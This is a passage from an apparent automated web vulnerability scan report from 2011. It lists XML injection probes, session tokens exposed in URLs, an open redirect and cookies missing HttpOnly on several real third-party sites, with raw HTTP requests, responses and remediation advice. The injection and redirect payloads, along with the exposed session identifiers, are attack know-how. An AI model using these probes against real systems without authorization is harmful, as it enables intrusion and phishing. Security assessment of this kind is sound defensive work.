<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.12. http://amch.questionmarket.com/favicon.ico [REST URL parameter 1]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/favicon.ico |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /favicon.ico]]>> HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 14:43:14 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.13. http://amch.questionmarket.com/surveyf/nav.php [REST URL parameter 1]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/surveyf/nav.php |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /surveyf]]>>/nav.php?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 14:38:08 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1844
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.14. http://amch.questionmarket.com/surveyf/nav.php [REST URL parameter 2]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/surveyf/nav.php |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /surveyf/nav.php]]>>?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 14:38:10 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1844
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.15. http://cdn.slidesharecdn.com/profile-photo-MillwardBrown-48x48 [REST URL parameter 1]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://cdn.slidesharecdn.com |
| Path: |
/profile-photo-MillwardBrown-48x48 |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /profile-photo-MillwardBrown-48x48]]>>?1295624731 HTTP/1.1 Host: cdn.slidesharecdn.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.slideshare.net/MillwardBrown/value-of-a-fan
|
Response
HTTP/1.1 403 Forbidden x-amz-request-id: 69D7660134B768E8 x-amz-id-2: ojYSUPDanvTXEw0kYKYDT9w8UV0c2U3P6N58YspVhfafM8vpUPPkKp1XCNQxNBWt Content-Type: application/xml Server: AmazonS3 Date: Sat, 17 Sep 2011 14:45:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
<?xml version="1.0" encoding="UTF-8"?> <Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>69D7660134B768E8</RequestId><HostId>ojYSUPDanvTXEw0kYKYDT9w8UV0c2U3P6N58YspVhfafM8vpUP ...[SNIP]...
|
9.16. http://cdn.slidesharecdn.com/profile-photo-MillwardBrownFrance-48x48 [REST URL parameter 1]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://cdn.slidesharecdn.com |
| Path: |
/profile-photo-MillwardBrownFrance-48x48 |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /profile-photo-MillwardBrownFrance-48x48]]>>?1297938293 HTTP/1.1 Host: cdn.slidesharecdn.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.slideshare.net/MillwardBrown/value-of-a-fan
|
Response
HTTP/1.1 403 Forbidden x-amz-request-id: A229F99A083A8322 x-amz-id-2: Ldr2snZLe0Hzp6AmBEH9g62UPHv2MDB5hY9kQSKU1Nn41OfB8kWTir30PI7xLxDG Content-Type: application/xml Server: AmazonS3 Date: Sat, 17 Sep 2011 14:46:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
<?xml version="1.0" encoding="UTF-8"?> <Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A229F99A083A8322</RequestId><HostId>Ldr2snZLe0Hzp6AmBEH9g62UPHv2MDB5hY9kQSKU1Nn41OfB8k ...[SNIP]...
|
10. Session token in URL
previous
next
There are 4 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
10.1. http://www.peopleschoice.com/pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Firm |
| Host: |
http://www.peopleschoice.com |
| Path: |
/pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__ |
Issue detail
The URL in the request appears to contain a session token within the query string:- http://www.peopleschoice.com/pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2
Request
GET /pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2 HTTP/1.1 Host: www.peopleschoice.com Proxy-Connection: keep-alive Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:09:55 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Last-Modified: Mon, 12 Sep 2011 05:16:22 GMT Cache-control: max-age=86400 Expires: Sun, 18 Sep 2011 13:09:55 GMT Content-Type: text/css;charset=ISO-8859-1 Content-Length: 86640 Via: 1.1 pca-www-02.sparkred.com Connection: close
.rich-color-picker-wrapper{display:none;overflow:hidden;position:absolute;width:350px;z-index:3;}.rich-color-picker-ext{border:1px solid;position:relative;height:170px;padding:0;margin:0;}.rich-color- ...[SNIP]...
|
10.2. http://www.peopleschoice.com/pca/img/pca_poll_bargold_logo.png
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Firm |
| Host: |
http://www.peopleschoice.com |
| Path: |
/pca/img/pca_poll_bargold_logo.png |
Issue detail
The URL in the request appears to contain a session token within the query string:- http://www.peopleschoice.com/pca/img/pca_poll_bargold_logo.png;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2
Request
GET /pca/img/pca_poll_bargold_logo.png;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2 HTTP/1.1 Host: www.peopleschoice.com Proxy-Connection: keep-alive Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:10:47 GMT Server: Apache Last-Modified: Thu, 08 Sep 2011 06:48:07 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 ETag: W/"354-1315464487000" Content-Length: 354 Via: 1.1 pca-www-02.sparkred.com Cache-Control: max-age=2764800, public Expires: Wed, 19 Oct 2011 13:04:09 GMT Age: 398 Connection: close Content-Type: image/png
.PNG . ...IHDR..............j. ....tEXtSoftware.Adobe ImageReadyq.e<...*PLTE..;..GSH...X..0..n.p............].....u......Q....tRNS..............E.......IDATx.\.Q.. ... >..._..:......A.........R6.... ...[SNIP]...
|
10.3. http://www.peopleschoice.com/pca/img/pca_small_email.png
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Firm |
| Host: |
http://www.peopleschoice.com |
| Path: |
/pca/img/pca_small_email.png |
Issue detail
The URL in the request appears to contain a session token within the query string:- http://www.peopleschoice.com/pca/img/pca_small_email.png;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2
Request
GET /pca/img/pca_small_email.png;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2 HTTP/1.1 Host: www.peopleschoice.com Proxy-Connection: keep-alive Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:10:39 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 ETag: W/"175-1315464483000" Last-Modified: Thu, 08 Sep 2011 06:48:03 GMT Content-Type: image/png Content-Length: 175 Via: 1.1 pca-www-02.sparkred.com Cache-Control: max-age=2764800, public Expires: Wed, 19 Oct 2011 13:10:39 GMT Connection: close
.PNG . ...IHDR....... .............tEXtSoftware.Adobe ImageReadyq.e<... PLTE...yyyzzz..|$...<IDATx.T....@.B.......f.0.(. ......%...14..]..tO.G....aGO......O5,.)....IEND.B`. |
10.4. http://www.peopleschoice.com/pca/polls/poll.jsp
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Firm |
| Host: |
http://www.peopleschoice.com |
| Path: |
/pca/polls/poll.jsp |
Issue detail
The response contains the following links that appear to contain session tokens:- http://www.peopleschoice.com/pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2
- http://www.peopleschoice.com/pca/emailfriend.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?src=/polls/poll.jsp%3FpollId=1000000270&pollId=1000000270
- http://www.peopleschoice.com/pca/img/pca_poll_bargold_logo.png;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2
- http://www.peopleschoice.com/pca/img/pca_small_email.png;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2
- http://www.peopleschoice.com/pca/polls/poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000267
- http://www.peopleschoice.com/pca/polls/poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000268
- http://www.peopleschoice.com/pca/polls/poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000268&cid=213917
- http://www.peopleschoice.com/pca/polls/poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000270
- http://www.peopleschoice.com/pca/polls/poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000272
- http://www.peopleschoice.com/pca/polls/poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000272&cid=213917
- http://www.peopleschoice.com/pca/polls/poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000274
Request
GET /pca/polls/poll.jsp?pollId=1000000270 HTTP/1.1 Host: www.peopleschoice.com Proxy-Connection: keep-alive Referer: http://wonderwall.msn.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:04:03 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2; Path=/ Via: 1.1 pca-www-02.sparkred.com Vary: Accept-Encoding Content-Length: 27744 Connection: close
<!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebo ...[SNIP]... </script><link class="component" href="/pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2" rel="stylesheet" type="text/css" /><script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"> ...[SNIP]... </div><a href="/pca/polls/poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000272&cid=213917" id="j_id87" class="pca-next-commment">Next Poll</a> ...[SNIP]... <div id="j_id99:3:j_id148" class="pca-latest-results-totals" style="right: 47%; z-index: 65;"> 53% <img src="/pca/img/pca_poll_bargold_logo.png;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2" alt="" height="16" style="border:0px !important;" width="16" /> </div> ...[SNIP]... </a> <a href="/pca/emailfriend.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?src=/polls/poll.jsp%3FpollId=1000000270&pollId=1000000270"><img src="/pca/img/pca_small_email.png;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2" alt="Email" /></a> ...[SNIP]... </div><a href="/pca/polls/poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000268&cid=213917" id="j_id267" class="pca-prev-commment">Previous Poll</a><a href="/pca/polls/poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000272&cid=213917" id="j_id270" class="pca-next-commment">Next Poll</a> ...[SNIP]... <p><a id="j_id278:0:link1" name="j_id278:0:link1" href="poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000274" style="color: #5a5a5a;">Disney classic <i> ...[SNIP]... <p><a id="j_id278:1:link1" name="j_id278:1:link1" href="poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000272" style="color: #5a5a5a;">Javier Colon, winner of NBC's <i> ...[SNIP]... <p><a id="j_id278:2:link1" name="j_id278:2:link1" href="poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000270" style="color: #5a5a5a;"><i> ...[SNIP]... <p><a id="j_id278:3:link1" name="j_id278:3:link1" href="poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000268" style="color: #5a5a5a;">1991 cult favorite <i> ...[SNIP]... <p><a id="j_id278:4:link1" name="j_id278:4:link1" href="poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000267" style="color: #5a5a5a;">Gosling and Marsden faceoff again! Which of the films out this weekend, two of which star the leading men from <i> ...[SNIP]...
|
11. Open redirection
previous
next
Summary
| Severity: |
Low |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/surveyf/ |
Issue detail
The value of the link request parameter is used to perform an HTTP redirect. The payload http%3a//acbbbf0ad7361ec26/a%3fhttp%3a//www.delish.com/search/fast_search_recipes%3fsearch_term%3dxss%20sugar%20cake%26 was submitted in the link parameter. This caused a redirection to the following URL:- http://acbbbf0ad7361ec26/a?http://www.delish.com/search/fast_search_recipes?search_term=xss sugar cake&
Issue background
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:- Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
- Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:- The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
- The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
- The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
Request
GET /surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3a//acbbbf0ad7361ec26/a%3fhttp%3a//www.delish.com/search/fast_search_recipes%3fsearch_term%3dxss%20sugar%20cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041
|
Response
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 14:42:58 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" Location: http://acbbbf0ad7361ec26/a?http://www.delish.com/search/fast_search_recipes?search_term=xss sugar cake& Content-Length: 0 Content-Type: text/html
|
12. Cookie without HttpOnly flag set
previous
next
There are 37 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
12.1. http://blekko.com/a/favicon
previous
next
Summary
| Severity: |
Low |
| Confidence: |
Firm |
| Host: |
http://blekko.com |
| Path: |
/a/favicon |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- sessionid=559518085; path=/; expires=Sat, 17 Sep 2011 18:43:13 GMT
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /a/favicon?d=1&h=www.forbes.com HTTP/1.1 Host: blekko.com Proxy-Connection: keep-alive Referer: http://blekko.com/ws/wpp+companies User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v=3; t=1316288660893
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 14:43:13 GMT Content-Type: image/png Connection: keep-alive Keep-Alive: timeout=15 Set-Cookie: sessionid=559518085; path=/; expires=Sat, 17 Sep 2011 18:43:13 GMT Cache-Control: max-age=28800 Expires: Sat, 17 Sep 2011 22:43:13 GMT Vary: Accept-Encoding Content-Length: 301 X-Blekko-PT: 7ca327c7be6a9864b29b192f5de0bcd9
.PNG . ...IHDR...............ex...lPLTE............................................................................................................M.[....|IDAT.....a.@..0..*3....;V.$k....6.d.V.>.... ...[SNIP]...
|
12.2. http://blekko.com/a/track
previous
next
Summary
| Severity: |
Low |
| Confidence: |
Firm |
| Host: |
http://blekko.com |
| Path: |
/a/track |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- sessionid=996256394; path=/; expires=Sat, 17 Sep 2011 18:43:16 GMT
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
